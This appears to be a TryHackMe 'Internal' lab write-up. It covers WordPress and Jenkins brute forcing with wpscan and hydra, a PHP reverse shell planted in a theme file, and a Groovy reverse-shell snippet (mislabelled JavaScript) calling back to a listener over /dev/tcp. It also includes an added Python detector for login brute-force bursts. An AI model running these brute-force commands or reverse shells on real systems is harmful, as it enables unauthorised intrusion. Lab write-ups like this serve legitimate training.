Internal (THM)

TryHackMe Internal Write-Up

topics: WordPress, Jenkins, PHP reverse shell, SSH tunneling, lateral movement, web applications, Linux privilege escalation, Docker environments, JavaScript reverse shell

  1. Enumeration

  2. Local Privilege Escalation

  3. Root Privilege Escalation

new tools:

Enumeration

Initial nmap scan: .././autonmap.sh $ip Full

We have two ports open, HTTP and SSH. The homepage is the default Apache page, so let's run a dirsearch scan.

The scan shows a phpMyAdmin page (fronting MySQL) as well as a WordPress login page. Let's run some wpscan commands.

wpscan --url internal.thm/blog -e u,p,t

We see there is an admin user for the WordPress site. We can run a quick brute force with

wpscan --url internal.thm/blog/wp-login.php --passwords rockyou.txt --usernames admin

The brute force attack was successful; we have obtained the creds admin:my2boys for the WordPress login.

We can inspect what the admin did previously on this site, including a couple of blog posts.

Cleartext credentials were left for us: william:arnold147. These creds, however, are not valid for SSH, WordPress or phpMyAdmin. Instead, let's inspect the plugins and themes to upload a PHP reverse shell.

Initial Access

Navigating to the theme editor, we can see the site uses the theme "Twenty Seventeen"; we can replace its 404.php file with the default Kali PHP reverse shell.

Listen for the shell, then trigger it with a request to http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php

Local Privilege Escalation

We have initial access with our PHP shell, but we can see we are not the default user aubreanna.

Running LinEnum.sh and enumerating the OS yields some interesting information, such as another port open locally on 8080 running a Docker proxy.

This did not return anything of use relating to aubreanna until we inspected the /opt directory.

We now have the credentials for aubreanna and are able to SSH in using aubreanna:bubb13guM!@#123

Lateral Movement

There is no command we can use from sudo -l, nor is there any relevant SUID file. However, from the LinEnum output we know that port 8080 is exposed locally, so let's SSH tunnel in to view what's running on that port.

ssh -L 8080:localhost:8080 aubreanna@10.10.48.50

A Jenkins server is running on this port. None of the three credential pairs we've obtained worked, so instead let's brute force with hydra. Check developer tools for the POST request specifics, such as the login path and the error message.

hydra -l admin -P /root/payloads/rockyou.txt localhost -s 8080 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"
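A detection-side counterpart to the two brute-force steps above (wpscan against wp-login.php and hydra against the Jenkins form login): an added example, not part of the original write-up, that scans Apache-style access logs for bursts of POSTs to those login endpoints from a single client. The log lines are constructed, and the 60-second window and threshold of 4 are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined-log fields we need: client IP, timestamp, method, path, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
LOGIN_PATHS = {"/blog/wp-login.php", "/j_acegi_security_check"}  # WordPress login, Jenkins form login

# Constructed sample log (not captured from the lab): 10.0.2.15 bursts POSTs at both
# login endpoints, while 10.0.2.99 is an ordinary visitor who logs in once.
SAMPLE_LOG = """\
10.0.2.15 - - [10/Oct/2023:12:00:01 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 3121 "-" "WPScan v3"
10.0.2.15 - - [10/Oct/2023:12:00:01 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 3121 "-" "WPScan v3"
10.0.2.15 - - [10/Oct/2023:12:00:02 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 3121 "-" "WPScan v3"
10.0.2.15 - - [10/Oct/2023:12:00:02 +0000] "POST /blog/wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3"
10.0.2.99 - - [10/Oct/2023:12:00:40 +0000] "POST /blog/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.2.15 - - [10/Oct/2023:12:05:00 +0000] "POST /j_acegi_security_check?from=%2F HTTP/1.1" 401 0 "-" "Mozilla/4.0 (Hydra)"
10.0.2.15 - - [10/Oct/2023:12:05:00 +0000] "POST /j_acegi_security_check?from=%2F HTTP/1.1" 401 0 "-" "Mozilla/4.0 (Hydra)"
10.0.2.15 - - [10/Oct/2023:12:05:01 +0000] "POST /j_acegi_security_check?from=%2F HTTP/1.1" 401 0 "-" "Mozilla/4.0 (Hydra)"
10.0.2.15 - - [10/Oct/2023:12:05:01 +0000] "POST /j_acegi_security_check?from=%2F HTTP/1.1" 401 0 "-" "Mozilla/4.0 (Hydra)"
"""

def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    path = path.split("?", 1)[0]  # drop the query string so /j_acegi_security_check?from=... groups together
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def detect_login_bruteforce(log_text, threshold=4, window=timedelta(seconds=60)):
    """Map (ip, path) -> most login POSTs seen inside any `window`, for pairs reaching `threshold`."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] in LOGIN_PATHS:
            attempts[(rec[0], rec[3])].append(rec[1])
    flagged = {}
    for key, times in attempts.items():
        times.sort()
        best, start = 0, 0
        for end, t in enumerate(times):  # sliding window over the sorted timestamps
            while t - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[key] = best
    return flagged
```

Both tools also leave distinctive User-Agent strings here, but the burst count is the signal that survives a changed User-Agent.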

We've successfully brute forced the admin account, obtaining the creds admin:spongebob. Logging in reveals a way to establish a reverse shell on this box: navigating to "Manage Jenkins" reveals a script console for executing JavaScript code.

We can run the following reverse shell code from pentestmonkey and establish a reverse shell on this new machine.

// Spawn /bin/bash wired to a /dev/tcp connection back to the listener; 10.0.0.1 and 2002 are placeholders for the listener's address and port
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()  // keep the console script alive until the shell exits

Root Privilege Escalation

Checking the /opt directory once more reveals the root credentials root:tr0ub13guM!@#123

We can now SSH into the main machine
